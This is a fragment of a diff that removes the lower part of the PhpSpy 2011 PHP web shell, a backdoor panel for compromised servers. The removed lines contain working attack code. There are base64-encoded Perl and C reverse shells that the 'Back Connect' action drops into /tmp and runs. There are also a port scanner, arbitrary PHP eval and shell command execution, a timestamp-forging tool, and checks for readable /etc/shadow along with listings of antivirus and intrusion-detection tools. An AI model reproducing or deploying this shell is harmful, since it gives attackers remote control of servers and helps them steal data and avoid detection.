-                                                }

-                                        }

-                                        if ($doing == 'insert') {

-                                                p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');

-                                        } else {

-                                                p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');

-                                                makehide('base64', $base64);

-                                        }

-                                        p('</table></form>');

-                                } else {

-                                        $querys = @explode(';',$sql_query);

-                                        foreach($querys as $num=>$query) {

-                                                if ($query) {

-                                                        p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");

-                                                        switch(qy($query))

-                                                        {

-                                                                case 0:

-                                                                        p('<h2>Error : '.mysql_error().'</h2>');

-                                                                        break;  

-                                                                case 1:

-                                                                        if (strtolower(substr($query,0,13)) == 'select * from') {

-                                                                                $allowedit = 1;

-                                                                        }

-                                                                        if ($getnumsql) {

-                                                                                $tatol = mysql_num_rows(q($getnumsql));

-                                                                                $multipage = multi($tatol, $pagenum, $page, $tablename);

-                                                                        }

-                                                                        if (!$tablename) {

-                                                                                $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));

-                                                                                $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);

-                                                                                preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);

-                                                                                $tablename = $matches[1][0];

-                                                                        }

-

-                                                                        /*********************/

-                                                                        $getfield = q("SHOW COLUMNS FROM $tablename");

-                                                                        $rowdb = array();

-                                                                        $keyfied = ''; //Ö÷¼ü×Ö¶Î

-                                                                        while($row = @mysql_fetch_assoc($getfield)) {

-                                                                                $rowdb[$row['Field']]['Key'] = $row['Key'];

-                                                                                $rowdb[$row['Field']]['Extra'] = $row['Extra'];

-                                                                                if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {

-                                                                                        $keyfied = $row['Field'];

-                                                                                }

-                                                                        }

-                                                                        /*********************/                                                         

-                                                                        //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ

-                                                                        if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {

-                                                                                $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);

-                                                                        }

-

-                                                                        $result = q($query);

-

-                                                                        p($multipage);

-                                                                        p('<table border="0" cellpadding="3" cellspacing="0">');

-                                                                        p('<tr class="head">');

-                                                                        if ($allowedit) p('<td>Action</td>');

-                                                                        $fieldnum = @mysql_num_fields($result);

-                                                                        for($i=0;$i<$fieldnum;$i++){

-                                                                                $name = @mysql_field_name($result, $i);

-                                                                                $type = @mysql_field_type($result, $i);

-                                                                                $len = @mysql_field_len($result, $i);

-                                                                                p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");

-                                                                        }

-                                                                        p('</tr>');

-                                                                        

-                                                                        while($mn = @mysql_fetch_assoc($result)){

-                                                                                $thisbg = bg();

-                                                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                                                                                $where = $tmp = $b1 = '';

-                                                                                //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ

-                                                                                foreach($mn as $key=>$inside){

-                                                                                        if ($inside) {

-                                                                                                //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£

-                                                                                                if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {

-                                                                                                        $where = $key."='".addslashes($inside)."'";

-                                                                                                        break;

-                                                                                                }

-                                                                                                $where .= $tmp.$key."='".addslashes($inside)."'";

-                                                                                                $tmp = ' AND ';

-                                                                                        }

-                                                                                }

-                                                                                //¶ÁÈ¡¼Ç¼ÓÃ

-                                                                                foreach($mn as $key=>$inside){

-                                                                                        $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';

-                                                                                }

-                                                                                $where = base64_encode($where);

-

-                                                                                if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');

-

-                                                                                p($b1);

-                                                                                p('</tr>');

-                                                                                unset($b1);

-                                                                        }

-                                                                        p('<tr class="head">');

-                                                                        if ($allowedit) p('<td>Action</td>');

-                                                                        $fieldnum = @mysql_num_fields($result);

-                                                                        for($i=0;$i<$fieldnum;$i++){

-                                                                                $name = @mysql_field_name($result, $i);

-                                                                                $type = @mysql_field_type($result, $i);

-                                                                                $len = @mysql_field_len($result, $i);

-                                                                                p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");

-                                                                        }

-                                                                        p('</tr>');

-                                                                        tbfoot();

-                                                                        p($multipage);

-                                                                        break;

-                                                                case 2:

-                                                                        $ar = mysql_affected_rows();

-                                                                        p('<h2>affected rows : <b>'.$ar.'</b></h2>');

-                                                                        break;

-                                                        }

-                                                }

-                                        }

-                                }

-                        } else {

-                                $query = q("SHOW TABLE STATUS");

-                                $table_num = $table_rows = $data_size = 0;

-                                $tabledb = array();

-                                while($table = mysql_fetch_array($query)) {

-                                        $data_size = $data_size + $table['Data_length'];

-                                        $table_rows = $table_rows + $table['Rows'];

-                                        $table['Data_length'] = sizecount($table['Data_length']);

-                                        $table_num++;

-                                        $tabledb[] = $table;

-                                }

-                                $data_size = sizecount($data_size);

-                                unset($table);

-                                p('<table border="0" cellpadding="0" cellspacing="0">');

-                                p('<form action="'.$self.'" method="POST">');

-                                makehide('action','mysqladmin');

-                                p($dbform);

-                                p('<tr class="head">');

-                                p('<td width="2%" align="center">&nbsp;</td>');

-                                p('<td>Name</td>');

-                                p('<td>Rows</td>');

-                                p('<td>Data_length</td>');

-                                p('<td>Create_time</td>');

-                                p('<td>Update_time</td>');

-                                if ($highver) {

-                                        p('<td>Engine</td>');

-                                        p('<td>Collation</td>');

-                                }

-                                p('<td>Operate</td>');

-                                p('</tr>');

-                                foreach ($tabledb as $key => $table) {

-                                        $thisbg = bg();

-                                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                                        p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');

-                                        p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');

-                                        p('<td>'.$table['Rows'].'</td>');

-                                        p('<td>'.$table['Data_length'].'</td>');

-                                        p('<td>'.$table['Create_time'].'&nbsp;</td>');

-                                        p('<td>'.$table['Update_time'].'&nbsp;</td>');

-                                        if ($highver) {

-                                                p('<td>'.$table['Engine'].'</td>');

-                                                p('<td>'.$table['Collation'].'</td>');

-                                        }

-                                        p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');

-                                        p('</tr>');

-                                }

-                                p('<tr class="head">');

-                                p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');

-                                p('<td>Name</td>');

-                                p('<td>Rows</td>');

-                                p('<td>Data_length</td>');

-                                p('<td>Create_time</td>');

-                                p('<td>Update_time</td>');

-                                if ($highver) {

-                                        p('<td>Engine</td>');

-                                        p('<td>Collation</td>');

-                                }

-                                p('<td>Operate</td>');

-                                p('</tr>');

-                                p('<tr class='.bg().'>');

-                                p('<td>&nbsp;</td>');

-                                p('<td>Total tables: '.$table_num.'</td>');

-                                p('<td>'.$table_rows.'</td>');

-                                p('<td>'.$data_size.'</td>');

-                                p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');

-                                p('</tr>');

-

-                                p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");

-                                makehide('doing','backupmysql');

-                                formfoot();

-                                p("</table>");

-                                fr($query);

-                        }

-                }

-        }

-        tbfoot();

-        @mysql_close();

-}//end mysql

-

-elseif ($action == 'backconnect') {

-        !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];

-        !$yourport && $yourport = '12345';

-        $usedb = array('perl'=>'perl','c'=>'c');

-

-        $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

-                "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

-                "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

-                "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

-                "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

-                "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

-                "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

-        $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

-                "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

-                "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

-                "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

-                "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

-                "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

-                "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

-                "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

-

-        if ($start && $yourip && $yourport && $use){

-                if ($use == 'perl') {

-                        cf('/tmp/angel_bc',$back_connect);

-                        $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");

-                } else {

-                        cf('/tmp/angel_bc.c',$back_connect_c);

-                        $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');

-                        @unlink('/tmp/angel_bc.c');

-                        $res = execute("/tmp/angel_bc $yourip $yourport &");

-                }

-                m("Now script try connect to $yourip port $yourport ...");

-        }

-

-        formhead(array('title'=>'Back Connect'));

-        makehide('action','backconnect');

-        p('<p>');

-        p('Your IP:');

-        makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));

-        p('Your Port:');

-        makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));

-        p('Use:');

-        makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));

-        makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));

-        p('</p>');

-        formfoot();

-}//end

-

-elseif ($action == 'portscan') {

-        !$scanip && $scanip = '127.0.0.1';

-        !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';

-        formhead(array('title'=>'Port Scan'));

-        makehide('action','portscan');

-        p('<p>');

-        p('IP:');

-        makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));

-        p('Port:');

-        makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));

-        makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));

-        p('</p>');

-        formfoot();

-

-        if ($startscan) {

-                p('<h2>Result &raquo;</h2>');

-                p('<ul class="info">');

-                foreach(explode(',', $scanport) as $port) {

-                        $fp = @fsockopen($scanip, $port, $errno, $errstr, 1); 

-                        if (!$fp) {

-                                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');

-                   } else {

-                                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');

-                                @fclose($fp);

-                   } 

-                }

-                p('</ul>');

-        }

-}

-

-elseif ($action == 'eval') {

-        $phpcode = trim($phpcode);

-        if($phpcode){

-                if (!preg_match('#<\?#si', $phpcode)) {

-                        $phpcode = "<?php\n\n{$phpcode}\n\n?>";

-                }

-                eval("?".">$phpcode<?");

-        }

-        formhead(array('title'=>'Eval PHP Code'));

-        makehide('action','eval');

-        maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));

-        p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');

-        formfooter();

-}//end eval

-

-elseif ($action == 'editfile') {

-        if(file_exists($opfile)) {

-                $fp=@fopen($opfile,'r');

-                $contents=@fread($fp, filesize($opfile));

-                @fclose($fp);

-                $contents=htmlspecialchars($contents);

-        }

-        formhead(array('title'=>'Create / Edit File'));

-        makehide('action','file');

-        makehide('dir',$nowpath);

-        makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));

-        maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));

-        formfooter();

-        

-        goback();

-

-}//end editfile

-

-elseif ($action == 'newtime') {

-        $opfilemtime = @filemtime($opfile);

-        //$time = strtotime("$year-$month-$day $hour:$minute:$second");

-        $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);

-        formhead(array('title'=>'Clone folder/file was last modified time'));

-        makehide('action','file');

-        makehide('dir',$nowpath);

-        makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));

-        makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));

-        formfooter();

-        formhead(array('title'=>'Set last modified'));

-        makehide('action','file');

-        makehide('dir',$nowpath);

-        makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));

-        p('<p>year:');

-        makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));

-        p('month:');

-        makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));

-        p('day:');

-        makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));

-        p('hour:');

-        makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));

-        p('minute:');

-        makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));

-        p('second:');

-        makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));

-        p('</p>');

-        formfooter();

-        goback();

-}//end newtime

-

-elseif ($action == 'shell') {

-        if (IS_WIN && IS_COM) {

-                if($program && $parameter) {

-                        $shell= new COM('Shell.Application');

-                        $a = $shell->ShellExecute($program,$parameter);

-                        m('Program run has '.(!$a ? 'success' : 'fail'));

-                }

-                !$program && $program = 'c:\windows\system32\cmd.exe';

-                !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';

-                formhead(array('title'=>'Execute Program'));

-                makehide('action','shell');

-                makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));

-                p('<p>');

-                makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));

-                makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));

-                p('</p>');

-                formfoot();

-        }

-        formhead(array('title'=>'Execute Command'));

-        makehide('action','shell');

-        if (IS_WIN && IS_COM) {

-                $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');

-                makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));

-        }

-        p('<p>');

-        makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));

-        makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));

-        p('</p>');

-        formfoot();

-

-        if ($command) {

-                p('<hr width="100%" noshade /><pre>');

-                if ($execfunc=='wscript' && IS_WIN && IS_COM) {

-                        $wsh = new COM('WScript.shell');

-                        $exec = $wsh->exec('cmd.exe /c '.$command);

-                        $stdout = $exec->StdOut();

-                        $stroutput = $stdout->ReadAll();

-                        echo $stroutput;

-                } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {

-                        $descriptorspec = array(

-                           0 => array('pipe', 'r'),

-                           1 => array('pipe', 'w'),

-                           2 => array('pipe', 'w')

-                        );

-                        $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);

-                        if (is_resource($process)) {

-                                fwrite($pipes[0], $command."\r\n");

-                                fwrite($pipes[0], "exit\r\n");

-                                fclose($pipes[0]);

-                                while (!feof($pipes[1])) {

-                                        echo fgets($pipes[1], 1024);

-                                }

-                                fclose($pipes[1]);

-                                while (!feof($pipes[2])) {

-                                        echo fgets($pipes[2], 1024);

-                                }

-                                fclose($pipes[2]);

-                                proc_close($process);

-                        }

-                } else {

-                        echo(execute($command));

-                }

-                p('</pre>');

-        }

-}//end shell

-

-elseif ($action == 'phpenv') {

-        $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';

-        $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');

-        !$dis_func && $dis_func = 'No'; 

-        $info = array(

-                1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),

-                2 => array('Server Domain',$_SERVER['SERVER_NAME']),

-                3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),

-                4 => array('Server OS',PHP_OS),

-                5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),

-                6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),

-                7 => array('Server Web Port',$_SERVER['SERVER_PORT']),

-                8 => array('PHP run mode',strtoupper(php_sapi_name())),

-                9 => array('The file path',__FILE__),

-

-                10 => array('PHP Version',PHP_VERSION),

-                11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),

-                12 => array('Safe Mode',getcfg('safe_mode')),

-                13 => array('Administrator',$adminmail),

-                14 => array('allow_url_fopen',getcfg('allow_url_fopen')),

-                15 => array('enable_dl',getcfg('enable_dl')),

-                16 => array('display_errors',getcfg('display_errors')),

-                17 => array('register_globals',getcfg('register_globals')),

-                18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),

-                19 => array('memory_limit',getcfg('memory_limit')),

-                20 => array('post_max_size',getcfg('post_max_size')),

-                21 => array('upload_max_filesize',$upsize),

-                22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),

-                23 => array('disable_functions',$dis_func),

-        );

-

-        if($phpvarname) {

-                m($phpvarname .' : '.getcfg($phpvarname));

-        }

-

-        formhead(array('title'=>'Server environment'));

-        makehide('action','phpenv');

-        makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));

-        formfooter();

-

-        $hp = array(0=> 'Server', 1=> 'PHP');

-        for($a=0;$a<2;$a++) {

-                p('<h2>'.$hp[$a].' &raquo;</h2>');

-                p('<ul class="info">');

-                if ($a==0) {

-                        for($i=1;$i<=9;$i++) {

-                                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

-                        }

-                } elseif ($a == 1) {

-                        for($i=10;$i<=23;$i++) {

-                                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

-                        }

-                }

-                p('</ul>');

-        }

-}//end phpenv

-

-elseif ($action == 'secinfo') {

-        

-        secparam('Server software', @getenv('SERVER_SOFTWARE'));

-        secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');

-        secparam('Open base dir', @ini_get('open_basedir'));

-        secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));

-        secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));

-        secparam('cURL support', function_exists('curl_version')?'enabled':'no');

-        $temp=array();

-        if(function_exists('mysql_get_client_info'))

-                $temp[] = "MySql (".mysql_get_client_info().")";

-        if(function_exists('mssql_connect'))

-                $temp[] = "MSSQL";

-        if(function_exists('pg_connect'))

-                $temp[] = "PostgreSQL";

-        if(function_exists('oci_connect'))

-                $temp[] = "Oracle";

-        secparam('Supported databases', implode(', ', $temp));

-        

-        if( !IS_WIN ) {

-                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');

-                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

-                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

-                secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');

-                secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');

-                secparam('OS version', @file_get_contents('/proc/version'));

-                secparam('Distr name', @file_get_contents('/etc/issue.net'));

-                $safe_mode = @ini_get('safe_mode');

-                if(!$GLOBALS['safe_mode']) {

-                        $temp=array();

-                        foreach ($userful as $item)

-                                if(which($item)){$temp[]=$item;}

-                        secparam('Userful', implode(', ',$temp));

-                        $temp=array();

-                        foreach ($danger as $item)

-                                if(which($item)){$temp[]=$item;}

-                        secparam('Danger', implode(', ',$temp));

-                        $temp=array();

-                        foreach ($downloaders as $item) 

-                                if(which($item)){$temp[]=$item;}

-                        secparam('Downloaders', implode(', ',$temp));

-                        secparam('Hosts', @file_get_contents('/etc/hosts'));

-                        secparam('HDD space', execute('df -h'));

-                        secparam('Mount options', @file_get_contents('/etc/fstab'));

-                }

-        } else {

-                secparam('OS Version',execute('ver'));

-                secparam('Account Settings',execute('net accounts'));

-                secparam('User Accounts',execute('net user'));

-                secparam('IP Configurate',execute('ipconfig -all'));

-        }

-}//end

-

-else {

-        m('Undefined Action');

-}

-

-?>

-</td></tr></table>

-<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">

-        <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>

-        Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.

-</div>

-</body>

-</html>

-

-<?php

-

-/*======================================================

-º¯Êý¿â

-======================================================*/

-

-function secparam($n, $v) {

-        $v = trim($v);

-        if($v) {

-                p('<h2>'.$n.' &raquo;</h2>');

-                p('<div class="infolist">');

-                if(strpos($v, "\n") === false)

-                        p($v.'<br />');

-                else

-                        p('<pre>'.$v.'</pre>');

-                p('</div>');

-        }

-}

-function m($msg) {

-        echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';

-        echo $msg;

-        echo '</div>';

-}

-function scookie($key, $value, $life = 0, $prefix = 1) {

-        global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;

-        $key = ($prefix ? $cookiepre : '').$key;

-        $life = $life ? $life : $cookielife;

-        $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;

-        setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);

-}       

-function multi($num, $perpage, $curpage, $tablename) {

-        $multipage = '';

-        if($num > $perpage) {

-                $page = 10;

-                $offset = 5;

-                $pages = @ceil($num / $perpage);

-                if($page > $pages) {

-                        $from = 1;

-                        $to = $pages;

-                } else {

-                        $from = $curpage - $offset;

-                        $to = $curpage + $page - $offset - 1;

-                        if($from < 1) {

-                                $to = $curpage + 1 - $from;

-                                $from = 1;

-                                if(($to - $from) < $page && ($to - $from) < $pages) {

-                                        $to = $page;

-                                }

-                        } elseif($to > $pages) {

-                                $from = $curpage - $pages + $to;

-                                $to = $pages;

-                                if(($to - $from) < $page && ($to - $from) < $pages) {

-                                        $from = $pages - $page + 1;

-                                }

-                        }

-                }

-                $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');

-                for($i = $from; $i <= $to; $i++) {

-                        $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';

-                }

-                $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');

-                $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';

-        }

-        return $multipage;

-}

-// µÇ½Èë¿Ú

-function loginpage() {

-?>

-        <style type="text/css">

-        input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}

-        </style>

-        <form method="POST" action="">

-        <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">

-        <input type="hidden" name="action" value="login">

-        <input type="submit" value="Login">

-        </form>

-<?php

-        exit;

-}//end loginpage()

-

-function execute($cfe) {

-        $res = '';

-        if ($cfe) {

-                if(function_exists('system')) {

-                        @ob_start();

-                        @system($cfe);

-                        $res = @ob_get_contents();

-                        @ob_end_clean();

-                } elseif(function_exists('passthru')) {

-                        @ob_start();

-                        @passthru($cfe);

-                        $res = @ob_get_contents();

-                        @ob_end_clean();

-                } elseif(function_exists('shell_exec')) {

-                        $res = @shell_exec($cfe);

-                } elseif(function_exists('exec')) {

-                        @exec($cfe,$res);

-                        $res = join("\n",$res);

-                } elseif(@is_resource($f = @popen($cfe,"r"))) {

-                        $res = '';

-                        while(!@feof($f)) {

-                                $res .= @fread($f,1024); 

-                        }

-                        @pclose($f);

-                }

-        }

-        return $res;

-}

-function which($pr) {

-        $path = execute("which $pr");

-        return ($path ? $path : $pr); 

-}

-

-function cf($fname,$text){

-        if($fp=@fopen($fname,'w')) {

-                @fputs($fp,@base64_decode($text));

-                @fclose($fp);

-        }

-}

-function dirsize($dir) { 

-        $dh = @opendir($dir);

-        $size = 0;

-        while($file = @readdir($dh)) {

-                if ($file != '.' && $file != '..') {

-                        $path = $dir.'/'.$file;

-                        $size += @is_dir($path) ? dirsize($path) : @filesize($path);

-                }

-        }

-        @closedir($dh);

-        return $size;

-}

-// Ò³Ãæµ÷ÊÔÐÅÏ¢

-function debuginfo() {

-        global $starttime;

-        $mtime = explode(' ', microtime());

-        $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);

-        echo 'Processed in '.$totaltime.' second(s)';

-}

-

-//Á¬½ÓMYSQLÊý¾Ý¿â

-function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {

-        global $charsetdb;

-        @ini_set('mysql.connect_timeout', 5);

-        if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {

